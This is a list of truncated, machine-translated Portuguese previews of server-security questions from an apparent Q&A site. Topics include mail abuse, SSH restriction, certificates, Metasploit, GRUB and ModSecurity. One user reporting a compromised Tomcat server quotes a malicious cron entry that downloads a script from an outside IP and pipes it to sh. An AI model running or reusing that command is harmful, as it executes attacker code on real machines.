Um de nossos servidores de correio semi-ocupado (sendmail) teve várias conexões de entrada nos últimos dias de hosts que emitem comandos de lixo. Nos últimos dois dias: conexões SMTP recebidas com comandos inválidos de 39.000 IPs exclusivos os IPs vêm de várias faixas em todo o mundo, não...
Eu já vi menção de proteger / dev / shm e / proc e fiquei imaginando como você faz isso e o que consiste em fazer? Suponho que isso envolva algum tipo de edição /etc/sysctl.conf. Como estes? kernel.exec-shield = 1 kernel.randomize_va_space = 1
Pense em uma empresa de hospedagem na web que deseja permitir que os usuários gerenciem arquivos e repositórios git via ssh. Isso inclui: cópia segura (scp) criando, copiando, movendo / renomeando e excluindo arquivos executando um subconjunto restrito de comandos para controle de origem e edição...
Já temos um certificado curinga para *.mycompany.com. Nossa rede possui hosts que são acessíveis apenas internamente. Todos eles pertencem ao internal.mycompany.comsubdomínio. Há um servidor privado com o nome do host server.internal.mycompany.comno qual implantei nosso certificado curinga. Quando...
Minha conta gratuita da AWS expirou. Excluí todos os recursos S3 e EC2, mas estou vagando se posso deixar o Key Pairse Security Groupssem ter que pagar por eles. (Os recursos da minha conta ficam assim agora: Recursos ) A documentação da Amazon parece não mencionar esse problema. Esses recursos...
Eu tenho um servidor dedicado debian. Estou tentando protegê-lo e uma maneira que pensei que seria bom é desligar os serviços de que não preciso, como o FTP, por exemplo. Estou sugerindo executar algo parecido com isto na implantação: service ntp stop update-rc.d -f ntp remove service vsftpd...
Antecedentes : a agregação remota de logs é considerada uma maneira de melhorar a segurança. Geralmente, isso lida com o risco de que um invasor que comprometa um sistema possa editar ou excluir logs para frustrar a análise forense. Pesquisei opções de segurança em ferramentas de log comuns. Mas...
Esta pergunta está relacionada ao tópico do Twitter do @ SwiftOnSecurity: https://twitter.com/SwiftOnSecurity/status/655208224572882944 Depois de ler o tópico, ainda não entendi por que você deseja desativar o logon de rede para contas locais. Então, aqui está o que estou pensando, corrija-me...
Um novo metasploit no kalilinux 2016 (mais recente estável) systemctl start postgresql OK No msfconsole msf > db_status [*] postgresql connected to msf Quando inicio a pesquisa msf > search samba [!] Module database cache not built yet, using slow search Então, eu reconstruo o cache...
Acabei de instalar MariaDbum novo Ubuntu Gnome e executei o mysql_secure_installation posteriormente, onde defini uma senha de administrador decente, removi o usuário anônimo etc. Depois, percebi um comportamento estranho em relação à senha do administrador: Se eu tentar fazer login na minha...
Fechadas. Esta questão está fora de tópico . No momento, não está aceitando respostas. Deseja melhorar esta pergunta? Atualize a pergunta para que ela esteja no tópico sobre Falha no servidor. Fechado há 3 anos . Qual é a maneira mais simples de obter...
Ao executar uma guerra de projeto no servidor Apache tomcat, descobri que o servidor foi comprometido. Enquanto estiver executando a guerra em um desconhecido, cronestá executando assim [root@App2 tmp]# crontab -l -u tomcat */11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh */12 * * *...
Eu tenho cerca de 200 usuários. 50 estão na Ásia, 50 na Europa Meridional e Oriental e cerca de 100 na Europa Ocidental. Gostaria de apontar os 50 usuários que estão na Ásia para nosso DC na Ásia e, atualmente, parece que eles estão se autenticando em nossos servidores europeus, causando um...
Eu gostaria que o Samhain monitore um arquivo, por exemplo /root/somefile,. Este arquivo não existe atualmente, mas eu gostaria de ser notificado se ele for criado a qualquer momento. Eu adiciono isso a samhainrc: [ReadOnly] file = /root/somefile Isso faz com que o Samhain emita estas entradas...
Atualmente, estou trabalhando para proteger meus servidores contra hackers - entre outras coisas, estou recebendo várias tentativas para fazer logon como root no ssh. Enquanto eu implementei o fail2ban, eu me pergunto, por que logons de raiz seriam permitidos por padrão para começar? Mesmo com...
Eu usei o comando grub-mkpasswd-pbkdf2para criptografar minha senha, então peguei a senha com hash e a coloquei no meu Ubuntu 14.04 /etc/grub.d/00_header: cat << EOF set superusers="itaig" password itaig grub.pbkdf2.sha512.10000.blah.blah set superusers="lel" password lel P@ssw0rd export...
Estou tentando colocar online um site com HTTPS. Verifiquei novamente o AWS Security Groups e tudo parece bem. Estou executando no Node.JS, e este é o script do aplicativo, por isso tenho certeza de que está executando na porta 443. https.createServer(options, app) .listen(443) .on('error',...
Eu tenho uma instância debian hospedada em rackspace e preciso copiar arquivos confidenciais para ela. Estou pensando em configurar um servidor ftp, mas tenho preocupações com a segurança, pois acredito que as credenciais são passadas em texto sem formatação? Existe um ftps que eu possa usar?...
Eu estava acessando www.example.com/RestAPI/index.php/tweets.jsonno meu servidor. O modsec_audit.logerro foi mostrado a seguir, mas não há erros / avisos relacionados em modsec_debug.log. Pude ver que o erro do servidor interno está registrado em example-error_log. Como posso depurar esse erro do...
Preciso proteger os dispositivos de mídia removíveis que se conectam a um sistema. O cliente propôs usar o Check Point Endpoint Security, (anteriormente Disknet Pro, eu acho) porque eles usaram com sucesso o Disknet Pro em alguns projetos no passado. Gostaria de receber algum feedback sobre esta...